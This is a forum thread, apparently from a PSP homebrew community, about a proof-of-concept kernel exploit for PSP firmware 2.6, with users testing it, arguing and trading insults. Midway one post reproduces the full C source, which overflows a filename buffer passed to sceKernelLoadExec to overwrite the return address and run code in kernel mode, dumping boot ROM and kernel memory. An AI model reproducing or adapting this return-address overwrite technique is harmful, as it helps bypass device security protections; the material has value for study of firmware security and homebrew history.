2.6 Kernel access - Proof of concept

[hàrléyg²]

http://forums.ps2dev.org/viewtopic.php?t=6091

Confirmed to work on: 2.50 and 2.60.

[ghostENVY]

maybe this can led to something since i trust anything the dev say

[Smiffers]

Interesting. Doesn't work on 2.01.

[hàrléyg²]

As said in irc, it can and will probably lead to flash0 access, and this will mean all 1.50 games / apps will work on 2.00+


edit:

Quote:

Interesting. Doesn't work on 2.01.

have you tried?

[iball®]

Yeah, riiiight....
So far there are three posts in that thread:

Quote:

Originally Posted by hitchhikr

http://perso.orange.fr/franck.charlet/Exploit_2.6.zip

There you have it boys.

Quote:

Originally Posted by Zettablade

eh? What is it? Is it safe?

Quote:

Originally Posted by harleyg

Yes, it is.

But no one says EXACTLY what it is or how it works. I don't trust it yet.

[ghostENVY]

has anyone tried already

[Smiffers]

Quote:

Originally Posted by harleyg

have you tried?

No... I just knew. YES I TRIED .

Quote:

As said in irc

What irc channel/network?

[KlyNeR]

okay...corrupt data @2.01

I'll try now with eloader

[TeamOverload]

What exactly does the Proof of Concept do? How do we know it is actually accessing the kernel?

[hàrléyg²]

iball, dont start.

not even going to argue with you.

[slickpick]

I have a 2.6.. how do I set it up?

just put the exploit with the eboot in the game folder?

[Smiffers]

Quote:

Originally Posted by harleyg

iball, dont start.

not even going to argue with you.

You didn't answer my question .

Quote:

What irc channel/network?

[KlyNeR]

ok, with eloader @2.01 it says:


game could not be startet...and then this errorcode

[iball®]

Quote:

Originally Posted by harleyg

iball, dont start.

not even going to argue with you.

Then feel free to explain it. And don't ever think you can tell me what to do.
I'll wait until math or Fan chime in or someone at least explains it in DETAIL.
I detest these silly links to ZIP files without actually taking the time to EXPLAIN what the **** it does and how it does it.

[ghostENVY]

dont know since i dont have a 2.6 but it doesnt seem to hurt to try

[hàrléyg²]

doesnt work on 2.01 then...

Quote:

okay...corrupt data @2.01

are you stupid?

anyway...
if you guys read the source, you would know.


also, its in the #pspdev channel.

[sousuke]

Quote:

Originally Posted by iball®

Yeah, riiiight....
So far there are three posts in that thread:
...

But no one says EXACTLY what it is or how it works. I don't trust it yet.

It's on ps2dev.org... , If it was posted here first then it would be ok to not trust it

[Smiffers]

Quote:

Originally Posted by harleyg

also, its in the #pspdev channel.

What network?

[KlyNeR]

Quote:

Originally Posted by harleyg

are you stupid?

I tried it normal in XMB and with eloader...tell me how stupid I am if I can try another way

[torrobinson]

Quote:

Originally Posted by slickpick

I have a 2.6.. how do I set it up?

just put the exploit with the eboot in the game folder?

Probably...
let us know what happene!

[PSPduh]

I have dl'ed the 2.6 exploit, and it has the src with it. (I have 1.5)

Quote:

Originally Posted by The copy.c in the download

Code:

// -------------------------------------------
// Kernel access under firmware 2.6
// (and probably 2.01 & 2.5 aswell)
// * Proof of concept code *
// Written by hitchhikr / Neural.
// -------------------------------------------

// -------------------------------------------
// Include
#include <pspkernel.h>
#include <pspdisplay.h>
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>

PSP_MODULE_INFO("2.6ploitation", 0, 1, 1);
PSP_MAIN_THREAD_ATTR(THREAD_ATTR_USER);

// -------------------------------------------
// This one will be executed in kernel mode
void kernel_proc(void) {
	// Dump'em all - read access
	int handle = sceIoOpen("ms0:/boot.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, (void*) 0xBFC00000 , 0x100000);
	sceIoClose(handle);
	handle = sceIoOpen("ms0:/kmem.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, (void*) 0x88000000 , 0x400000);
	sceIoClose(handle);
	handle = sceIoOpen("ms0:/klib.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, (void*) 0x88800000 , 0x100000);
	sceIoClose(handle);

	// Check if we have write access
	unsigned int *probe = (unsigned int *) 0x883EFC40;
	probe[0] = 0x12345678;
	
	// This file must contain 0x12345678
	handle = sceIoOpen("ms0:/writeaccess.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, probe, 4);
	sceIoClose(handle);

	probe[0] = 0;

	for(;;) { }
}

// -------------------------------------------
// Program entry point
int main(int argc, char* argv[]) {
	int i;
   	int handle;
   
	char filename[256];
	unsigned int *dwfilename;
	// This address must *NOT* contains a 00
	unsigned int *loop = (unsigned int *) 0x9f02020;
	unsigned int *loopsrc = (unsigned int *) &kernel_proc;
	char *msg = "chhikr hitchhikr hitchhikr hitchhikr hitchik";

	sceKernelDcacheWritebackAll();

	// Copy the test code into a safe place
	for(i = 0; i < 100; i++) {
		loop[i] = loopsrc[i];
	}
	memset(filename, 0, sizeof(filename));
	// Fill it with **** (*MUST* be 44 bytes)
	for(i = 0; i < 44; i++) {
		filename[i] = msg[i];
	}
	// Own the $ra
	dwfilename = (unsigned int *) &filename[44];
	dwfilename[0] = (unsigned int) loop;
	// Complete the string
	filename[48] = ':';
	filename[49] = '\0';

	// We need this for some odd flushing (?) reasons
	handle = sceIoOpen("ms0:/odd.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, dwfilename, 4);
	sceIoClose(handle);

	sceKernelLoadExec(filename, NULL); 	
	return(0);
}

I have NO idea whatsoever what this means, but mayb a more experinced dev could look at it.
--PSPduh

[Kemps]

so somebody can get smashgpsp to work for 2.6?!?!?

[iball®]

Quote:

Originally Posted by sousuke

It's on ps2dev.org... , If it was posted here first then it would be ok to not trust it

DId you read my earlier post?
There's no explanation on what it does, how it works, or what it's supposed to be exploiting/bypassing.
Not wasting my time with it until the source is posted.
And no, I don't feel like taking the single EBOOT file and looking at it.

[hàrléyg²]

Quote:

Originally Posted by Smith|

What network?

look on there f*cking site, jesus.

iball, read the god damn code.


im just reporting this, so yup i wont be posting in this thread now, ill just sit back and watch the noobs say OMGOMG ISOS!

[slickpick]

Okay I put the exploit folder with eboot (DIDNT MESS WITH THE MAKEFILE OR ANYTHING) ok i just tried it and all it did was say exit menu and then nothing happened.

[hàrléyg²]

god damn it... look on the memory stick, are there files there?

if so, you just created them in kernel mode.

like i said, its proof of concept.

[ghostENVY]

i dont think it will work since it say load kernel which the psp 2.6 cant do as of now but hope that it does works so someday i can upgrade to 2.6

[PSPduh]

Quote:

Originally Posted by iball®

DId you read my earlier post?
There's no explanation on what it does, how it works, or what it's supposed to be exploiting/bypassing.
Not wasting my time with it until the source is posted.
And no, I don't feel like taking the single EBOOT file and looking at it.

Read my earlier post.
I posted the source that came with it.
--PSPduh

[Kemps]

iball i have the feeling nobody likes you...
and is there instructions on how to install and run and ****?

[whitehawk]

Quote:

Originally Posted by KlyNeR

I tried it normal in XMB and with eloader...tell me how stupid I am if I can try another way

It's cause he said it didn't work on 2.01, and now you're saying it's not working on 2.01..